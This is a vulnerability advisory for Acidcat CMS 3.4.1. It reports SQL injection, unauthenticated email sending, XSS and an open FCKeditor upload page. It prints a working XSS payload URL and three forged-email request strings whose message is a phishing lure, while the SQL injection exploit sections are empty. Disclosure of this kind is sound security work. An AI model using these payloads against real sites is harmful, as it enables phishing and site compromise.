|
########################## www.BugReport.ir #######################################=0D
#=0D
# AmnPardaz Security Research Team=0D
#=0D
# Title: Acidcat CMS Multiple Vulnerabilities. =0D
# Vendor: www.acidcat.com=0D
# Vulnerable Version: 3.4.1=0D
# Exploit: Available=0D
# Impact: High=0D
# Fix: N/A=0D
# Original Advisory: http://bugreport.ir/index.php?/36=0D
###################################################################################=0D
=0D
=0D
####################=0D
1. Description:=0D
####################=0D
Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.=0D
=0D
####################=0D
2. Vulnerability:=0D
####################=0D
2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.=0D
2.1.1. POC:=0D
Check the exploit section.=0D
2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.=0D
2.2.1. POC:=0D
Check the exploit section.=0D
2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.=0D
2.3.1. POC:=0D
Check the exploit section.=0D
2.4. There is a XSS in "/admin/admin_colors_swatch.asp".=0D
2.4.1. POC:=0D
/admin/admin_colors_swatch.asp?field=value='';}alert('XSS');function(){myForm.myText=0D
2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.=0D
2.5.1. POC:=0D
/admin/fckeditor/editor/filemanager/connectors/test.html=0D
####################=0D
3. Exploits:=0D
####################=0D
=0D
Original Exploit URL: http://bugreport.ir/index.php?/36/exploit=0D
=0D
3.1. Attacker can gain usernames and passwords:=0D
-------------=0D
=0D
=0D
-------------=0D
3.2. Attacker can send email without any permission:=0D
-------------=0D
default_mail_aspemail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D
=0D
default_mail_cdosys.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D
=0D
default_mail_jmail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D
-------------=0D
3.3. Attacker can login to the site:=0D
-------------=0D
=0D
-------------=0D
####################=0D
4. Solution:=0D
####################=0D
Edit the source code to ensure that inputs are properly sanitized.=0D
####################=0D
- Credit :=0D
####################=0D
AmnPardaz Security Research & Penetration Testing Group=0D
Contact: admin[4t}bugreport{d0t]ir=0D
WwW.BugReport.ir=0D
WwW.AmnPardaz.com=0D